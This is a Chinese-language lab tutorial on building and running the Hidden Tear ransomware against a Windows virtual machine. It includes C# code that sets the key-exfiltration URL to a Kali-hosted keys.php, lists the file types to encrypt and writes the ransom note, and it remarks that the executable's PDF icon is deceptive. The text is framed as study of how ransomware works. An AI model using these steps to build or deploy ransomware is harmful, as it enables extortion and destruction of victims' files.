Hidden Tear 勒索病毒

简介

项目地址：

这是一个类似勒索软件的文件加密器示例，我们可以针对特定目的对它进行修改。

特征：

• 使用AES算法去加密文件
• 发送秘钥到服务器
• 被加密的文件可以在解密程序里用密钥解密
• 创建一个文本文件，给受害者一段信息
• 反病毒程序检测结果：hidden-tear.exe | 12/23 | NoDistribute

我们可以通过这个简单的病毒，去了解勒索病毒是如何工作的。

简单复现

Visual Studio 安装.NET 环境，打开./hidden-tear/hidden-tear.sln，对加密器进行定制。

1. 没有云服务器，我们用 Kali Linux 虚拟机作为web服务器，使用 phpstudy 搭建。

2. 在服务器通过ifconfig查看 ip 地址192.168.37.137
   

3. 网站目录下编写keys.php文件用来接收秘钥
   

4. 测试是否成功，访问192.168.37.137/keys.php?info=1111 或者?info=2222
   

5. web server 搭建完成之后，我们需要再准备一个加密程序，下面列出需要修改的变量

//web server 以及相关 Url 服务
string targetURL = "http://192.168.37.137/keys.php?info=";

//将被加密的文件的后缀
var validExtensions = new[]
{
	".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
 };

//加密后给受害者留下来的提示信息，保存在C:\\User\\[username]\\Desktop\\test\\READ_IT.txt
public void messageCreator()
{
	string path = "\\Desktop\\test\\READ_IT.txt";  //文件名
	string fullpath = userDir + userName + path;
	string[] lines = { "Files has been encrypted with hidden tear", "Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." };  //文件信息
	System.IO.File.WriteAllLines(fullpath, lines);
}

6. 保存之后build->build solution，在hidden-tear\hidden-tear\bin\Debug目录下面找到hidden-tear.exe文件，图标是一个pdf，很有迷惑性。
   
7. 准备一台windows 8.1虚拟机作为victim，在\\Desktop\\test目录下面创建hello.txt
   
8. 使用hidden-tear.exe进行攻击，可以看到hello.txt已经被加密修改成了hello.txt.txt.loacked
   
   
   
9. 使用解密器进行解密，需要我们服务器接收到的秘钥（每次接收一行）
   
10. 解密成功，重新变成hello.txt
    

源码分析